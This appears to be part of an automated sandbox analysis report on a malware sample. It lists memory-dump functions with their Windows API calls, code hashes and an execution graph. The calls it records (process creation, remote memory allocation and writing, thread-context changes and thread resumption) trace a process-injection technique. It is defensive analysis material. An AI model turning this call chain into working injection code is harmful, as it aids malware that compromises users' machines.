                                                                                                                                                                                                                                                                                                • API ID: CreateProcess
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 963392458-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 52114997373f7f93c94a40dd6799fd69a3f85edbfd39c9b6028e3748335ffc52
                                                                                                                                                                                                                                                                                                • Instruction ID: 5ba3de788d882b075fe3e3159d4c5f0b6adf884e6df67dceb5706c80134e365c
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 52114997373f7f93c94a40dd6799fd69a3f85edbfd39c9b6028e3748335ffc52
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A1C12871D002298FDB15CFA8CC81BEDBBB1BF49314F0095A9E849B7250DB749A89CF95
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 02A276E0 Relevance: 1.8, APIs: 1, Instructions: 321processCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 02A279A7
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000008.00000002.355487874.0000000002A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_2a20000_HBhG.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CreateProcess
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 963392458-0
                                                                                                                                                                                                                                                                                                • Opcode ID: d2d18f078e6c54bc2566b286b7276588cb0c259dbac3a9f4322dd3763010dba7
                                                                                                                                                                                                                                                                                                • Instruction ID: 934256f8b789d1428abc27e9b24264cccd79df0f102f1b2214869c1386213da8
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d2d18f078e6c54bc2566b286b7276588cb0c259dbac3a9f4322dd3763010dba7
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A4C12871D002298FDB15CFA8CC81BEDBBB1BF49314F0095A9E849B7250DB749A89CF95
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 02A26F48 Relevance: 1.6, APIs: 1, Instructions: 119injectionCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02A27023
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000008.00000002.355487874.0000000002A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_2a20000_HBhG.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MemoryProcessWrite
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3559483778-0
                                                                                                                                                                                                                                                                                                • Opcode ID: f4f559dd45bd839d95d2e8138e32a9cf6fd49830a1210ca888535d80861fd1ff
                                                                                                                                                                                                                                                                                                • Instruction ID: d93867edf0536fad3d74ed93ba98a59e6c97bb032324831495995d05d3e4fd3b
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f4f559dd45bd839d95d2e8138e32a9cf6fd49830a1210ca888535d80861fd1ff
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B541ABB5D012589FCF00CFA9D984ADEFBF1BB49310F14902AE818B7210D739AA45CF64
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 02A26F50 Relevance: 1.6, APIs: 1, Instructions: 116injectionCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02A27023
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000008.00000002.355487874.0000000002A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_2a20000_HBhG.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MemoryProcessWrite
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3559483778-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 862bc60608013892ffabee95136ddb7290a0de477f072876914cb433b7089781
                                                                                                                                                                                                                                                                                                • Instruction ID: 2a63aa1a2ef9f314ee2841760e1de030bef287d85e4949e9ffc536642937a0b5
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 862bc60608013892ffabee95136ddb7290a0de477f072876914cb433b7089781
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5341ABB5D012589FCF00CFAAD984ADEFBF1BB49310F14902AE818B7210D779AA45CF64
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 02A270A1 Relevance: 1.6, APIs: 1, Instructions: 108COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02A2715A
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000008.00000002.355487874.0000000002A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_2a20000_HBhG.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MemoryProcessRead
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 1726664587-0
                                                                                                                                                                                                                                                                                                • Opcode ID: c79abc2806464bf1d908301bce151db7e04c65b8afc15c0461eea09ffdccd4e1
                                                                                                                                                                                                                                                                                                • Instruction ID: 10090a9048825401400c93653561c1e5f61d971f0bf03489be9d03b2b1ff02e5
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c79abc2806464bf1d908301bce151db7e04c65b8afc15c0461eea09ffdccd4e1
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E241ACB5D002589FCF00CFAAD980ADEFBB1BF49310F14942AE814B7210D779A945CF64
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 02A270A8 Relevance: 1.6, APIs: 1, Instructions: 106COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02A2715A
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000008.00000002.355487874.0000000002A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_2a20000_HBhG.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MemoryProcessRead
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 1726664587-0
                                                                                                                                                                                                                                                                                                • Opcode ID: e5d53533ca346798af6519318995524a8c126b7e2039501ab0ad547a44676c6b
                                                                                                                                                                                                                                                                                                • Instruction ID: 09f8ae77ab4c5c12721f65e65e852967c3d63433bdc093efd8eec5a98988cb06
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e5d53533ca346798af6519318995524a8c126b7e2039501ab0ad547a44676c6b
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2C418AB5D002689FCF10CFAAD980AEEFBB1BB49310F14942AE815B7210D779A945CF64
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 02A26E29 Relevance: 1.6, APIs: 1, Instructions: 103memoryCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 02A26EDA
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000008.00000002.355487874.0000000002A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_2a20000_HBhG.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 4275171209-0
                                                                                                                                                                                                                                                                                                • Opcode ID: bae3f5fd6458a03735b984f49af5fc9ab0c51bb1f018d495c388dc71988fa509
                                                                                                                                                                                                                                                                                                • Instruction ID: 47eb6a25c7033ddc2f5d61a3ff294b184b6e84db2504f954e73388acf029d768
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bae3f5fd6458a03735b984f49af5fc9ab0c51bb1f018d495c388dc71988fa509
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4B3178B5D012589FCF10CFAAD980ADEBBB5BB49310F10A42AE815B7310D735A945CF65
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 02A26E30 Relevance: 1.6, APIs: 1, Instructions: 101memoryCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 02A26EDA
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000008.00000002.355487874.0000000002A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_2a20000_HBhG.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 4275171209-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 68217111688b584ec609e16293b03b63a2abf2f65425e90cca845e9d512ec9de
                                                                                                                                                                                                                                                                                                • Instruction ID: 70c5533d0f9e8e2cddbb996d2e824e948e6c4faeb35c15bfc76fa9b16360da55
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 68217111688b584ec609e16293b03b63a2abf2f65425e90cca845e9d512ec9de
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A63187B9D01258DFCF10CFAAD980ADEBBB5BB49310F10A42AE815B7310DB35A945CF65
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 02A26D00 Relevance: 1.6, APIs: 1, Instructions: 96threadinjectionCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • SetThreadContext.KERNELBASE(?,?), ref: 02A26DB7
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000008.00000002.355487874.0000000002A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_2a20000_HBhG.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ContextThread
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 1591575202-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 5e361ba8a9d3b1fd29fbebe41ca281101838009d36331cb8eba7a3ea23d9fc89
                                                                                                                                                                                                                                                                                                • Instruction ID: d8c5e819407d439e753a8961a752cb598faec84166a5eb04083d4f693bc33c89
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5e361ba8a9d3b1fd29fbebe41ca281101838009d36331cb8eba7a3ea23d9fc89
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4B41ACB5D012589FCB10DFAAD884AEEBBF5AB49314F14802AE418B7200D778A949CF64
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 02A26D08 Relevance: 1.6, APIs: 1, Instructions: 94threadinjectionCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • SetThreadContext.KERNELBASE(?,?), ref: 02A26DB7
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000008.00000002.355487874.0000000002A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_2a20000_HBhG.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ContextThread
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 1591575202-0
                                                                                                                                                                                                                                                                                                • Opcode ID: d46fc59bec24945ca994586ba8f57e28fe2e3e8a933c74c60d196c6336904dfd
                                                                                                                                                                                                                                                                                                • Instruction ID: 0a98d1562ca8438731621f5b86c6be16014c9bb4085ed0e088ff9b2a1c861310
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d46fc59bec24945ca994586ba8f57e28fe2e3e8a933c74c60d196c6336904dfd
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D631BBB5D012589FCF10DFAAD884AEEBBF5AB49314F14802AE418B7200D778A949CF64
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 02A26BE1 Relevance: 1.6, APIs: 1, Instructions: 75threadCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • ResumeThread.KERNELBASE(?), ref: 02A26C66
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000008.00000002.355487874.0000000002A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_2a20000_HBhG.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ResumeThread
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 947044025-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 55a59f754b531e49ef94c9729a5724b1b390d02d16f5c99cfa5670fe48e0f287
                                                                                                                                                                                                                                                                                                • Instruction ID: 580f8051b241f8466f711b50ad7865910c86d81aac7ad80be1bcebe40be99f97
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 55a59f754b531e49ef94c9729a5724b1b390d02d16f5c99cfa5670fe48e0f287
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3831CEB5D012189FCF10DFAAD580ADEFBB5EB48310F14942AE814B7300DB35A945CFA4
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 02A26BE8 Relevance: 1.6, APIs: 1, Instructions: 73threadCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • ResumeThread.KERNELBASE(?), ref: 02A26C66
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000008.00000002.355487874.0000000002A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_2a20000_HBhG.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ResumeThread
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 947044025-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 4e26b6318b4a4aa74372c5c06942647953f7de7efcfcb33526139ba25fca5e66
                                                                                                                                                                                                                                                                                                • Instruction ID: 4ed204bb8e51577e60b5b7fba338fff7ba6a60307707c438b1a4831b48b61d54
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4e26b6318b4a4aa74372c5c06942647953f7de7efcfcb33526139ba25fca5e66
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5231ACB4D012189FCF14DFAAD584ADEFBB5EB49310F14942AE819B7310CB78A945CFA4
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Non-executed Functions

                                                                                                                                                                                                                                                                                                Function 02A24810 Relevance: 4.0, Strings: 3, Instructions: 202COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000008.00000002.355487874.0000000002A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_2a20000_HBhG.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: P$UUUU$rA29
                                                                                                                                                                                                                                                                                                • API String ID: 0-1803072496
                                                                                                                                                                                                                                                                                                • Opcode ID: def60d9c00b0b37f3bc70a0b6557dc1e5e869fa2ea0f5ab6ba5fa030a2a56520
                                                                                                                                                                                                                                                                                                • Instruction ID: 66eb77c142a23318164f98e2f6c2e6211f8e5f59e959fccef12c4b2bec99299d
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: def60d9c00b0b37f3bc70a0b6557dc1e5e869fa2ea0f5ab6ba5fa030a2a56520
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 99A1B2B1E016288FDB64CFA9DA807CDBBF6BB88300F5491A6D548EB245D7349E85CF04
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 02A20BD0 Relevance: 1.4, Strings: 1, Instructions: 114COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000008.00000002.355487874.0000000002A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_2a20000_HBhG.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: 4
                                                                                                                                                                                                                                                                                                • API String ID: 0-4088798008
                                                                                                                                                                                                                                                                                                • Opcode ID: ea83e833652eb373fc1e68e124fc18da52317c8e1a32ab5b88fa47e454e75fce
                                                                                                                                                                                                                                                                                                • Instruction ID: fd292e74d13f98e01738c79ac983d0ca0c42f71246b55c6359245cfe2a9f12f8
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ea83e833652eb373fc1e68e124fc18da52317c8e1a32ab5b88fa47e454e75fce
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1F517371E016588BEB69CF6B9D4078AFAF7BFC8200F14D1FA950CA6255DB704A85CF11
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 02A20968 Relevance: .2, Instructions: 151COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000008.00000002.355487874.0000000002A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_2a20000_HBhG.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 6a70323adfc0f941548476fa3ddae6fb805b3fc4caf9ed4c22b9f003f0b36169
                                                                                                                                                                                                                                                                                                • Instruction ID: e6beda4c11fd0b8b1be022107a6f38b5910deda97285314c026d043a5c1bfb3a
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6a70323adfc0f941548476fa3ddae6fb805b3fc4caf9ed4c22b9f003f0b36169
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FE516D30A002888FD746EFB9F45469A7FF2BF88304F10CA29D108AB76AEF7559059B51
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 02A20978 Relevance: .1, Instructions: 145COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000008.00000002.355487874.0000000002A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_2a20000_HBhG.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: ccd56ba0ea7a9e44b51778803b0b4797ed27e12435d8a65d51bbfa520e70b873
                                                                                                                                                                                                                                                                                                • Instruction ID: 8315d5ae6056a3bc0db0bfd33e8921b25e8be59b4115cd4f811de74702e538ff
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ccd56ba0ea7a9e44b51778803b0b4797ed27e12435d8a65d51bbfa520e70b873
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D8514C70A00288CFD746EFB9F49469E7FF2BB98304F10C929D108AB76AEF7559059B50
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                                                                                Execution Coverage:5.8%
                                                                                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:5.2%
                                                                                                                                                                                                                                                                                                Signature Coverage:4.9%
                                                                                                                                                                                                                                                                                                Total number of Nodes:655
                                                                                                                                                                                                                                                                                                Total number of Limit Nodes:79
                                                                                                                                                                                                                                                                                                execution_graph 22740 4200f3 22743 41e7b3 22740->22743 22748 41f203 22743->22748 22745 41e7cf 22752 1769a00 LdrInitializeThunk 22745->22752 22746 41e7ea 22750 41f288 22748->22750 22751 41f212 22748->22751 22750->22745 22751->22750 22753 4195b3 22751->22753 22752->22746 22754 4195cd 22753->22754 22757 4195c1 22753->22757 22754->22750 22756 41971f 22756->22750 22757->22754 22758 419a33 LdrLoadDll 22757->22758 22758->22756 22759 40b553 22760 40b578 22759->22760 22765 40cf93 22760->22765 22764 40b5d0 22766 40cfb7 22765->22766 22767 40cff3 LdrLoadDll 22766->22767 22768 40b5ab 22766->22768 22767->22768 22768->22764 22769 40eb23 22768->22769 22770 40eb4f 22769->22770 22780 41e413 22770->22780 22773 40eb6f 22773->22764 22777 40ebaa 22789 41e6c3 22777->22789 22779 40ebcd 22779->22764 22781 41f203 LdrLoadDll 22780->22781 22782 40eb68 22781->22782 22782->22773 22783 41e453 22782->22783 22784 41f203 LdrLoadDll 22783->22784 22785 41e46f 22784->22785 22792 1769710 LdrInitializeThunk 22785->22792 22786 40eb92 22786->22773 22788 41ea43 LdrLoadDll 22786->22788 22788->22777 22790 41f203 LdrLoadDll 22789->22790 22791 41e6df NtClose 22790->22791 22791->22779 22792->22786 22794 1769540 LdrInitializeThunk 22795 17b0b13 22796 17b0b4d 22795->22796 22798 17b0b43 22795->22798 22799 17b1570 22796->22799 22800 17b15a3 22799->22800 22801 17b16da 22800->22801 22809 1769860 LdrInitializeThunk 22800->22809 22803 17b16e8 22801->22803 22816 17695d0 LdrInitializeThunk 22801->22816 22803->22798 22805 17b15bb 22805->22801 22810 17b1879 22805->22810 22808 17b1616 22808->22801 22817 17b1ad6 LdrInitializeThunk 22808->22817 22809->22805 22811 17b1885 22810->22811 22813 17b1899 22811->22813 22818 1769660 LdrInitializeThunk 22811->22818 22813->22808 22815 17b18bf 22815->22813 22819 17b1ad6 LdrInitializeThunk 22815->22819 22816->22803 22817->22801 22818->22815 22819->22813 22820 401798 22821 4017a5 22820->22821 22825 423313 22821->22825 22828 423308 22821->22828 22822 401822 22832 41fc33 22825->22832 22829 423313 22828->22829 22830 41fc33 22 API calls 22829->22830 22831 42331e 22830->22831 22831->22822 22833 41fc59 22832->22833 22846 40bf23 22833->22846 22835 41fc65 22836 41fcc9 22835->22836 22854 410103 22835->22854 22836->22822 22838 41fc84 22839 41fc97 22838->22839 22866 4100c3 22838->22866 22842 41fcac 22839->22842 22875 41e8e3 22839->22875 22871 403593 22842->22871 22844 41fcbb 22845 41e8e3 2 API calls 22844->22845 22845->22836 22878 40be73 22846->22878 22848 40bf30 22849 40bf37 22848->22849 22890 40be13 22848->22890 22849->22835 22855 41012f 22854->22855 23281 40d463 22855->23281 22857 410141 23285 40ffd3 22857->23285 22860 410174 22862 410185 22860->22862 22865 41e6c3 2 API calls 22860->22865 22861 41015c 22863 410167 22861->22863 22864 41e6c3 2 API calls 22861->22864 22862->22838 22863->22838 22864->22863 22865->22862 22867 4195b3 LdrLoadDll 22866->22867 22868 4100e2 22867->22868 22869 4100e9 22868->22869 22870 4100eb GetUserGeoID 22868->22870 22869->22839 22870->22839 22872 4035ea 22871->22872 22874 4035f7 22872->22874 23304 40dde3 22872->23304 22874->22844 22876 41e902 ExitProcess 22875->22876 22877 41f203 LdrLoadDll 22875->22877 22877->22876 22909 41ce63 22878->22909 22882 40be99 22882->22848 22883 40be8f 22883->22882 22916 41f583 22883->22916 22885 40bed6 22885->22882 22927 40bcb3 22885->22927 22887 40bef6 22933 40b713 LdrLoadDll 22887->22933 22889 40bf08 22889->22848 22891 40be30 22890->22891 22892 41f873 LdrLoadDll 22890->22892 23263 41f873 22891->23263 22892->22891 22895 41f873 LdrLoadDll 22896 40be5d 22895->22896 22897 40fec3 22896->22897 22898 40fedc 22897->22898 23267 40d2e3 22898->23267 22900 40feef 22901 41e413 LdrLoadDll 22900->22901 22902 40fefe 22901->22902 22903 40bf48 22902->22903 23271 41ea03 22902->23271 22903->22835 22905 40ff15 22906 40ff40 22905->22906 23274 41e493 22905->23274 22908 41e6c3 2 API calls 22906->22908 22908->22903 22910 41ce72 22909->22910 22911 4195b3 LdrLoadDll 22910->22911 22912 40be86 22911->22912 22913 41cd23 22912->22913 22934 41e833 22913->22934 22917 41f59c 22916->22917 22937 4191a3 22917->22937 22919 41f5b4 22920 41f5bd 22919->22920 22976 41f3c3 22919->22976 22920->22885 22922 41f5d1 22922->22920 22993 41e133 22922->22993 22924 41f605 22998 420133 22924->22998 23241 4094a3 22927->23241 22929 40bcd4 22929->22887 22930 40bccd 22930->22929 23254 409763 22930->23254 22933->22889 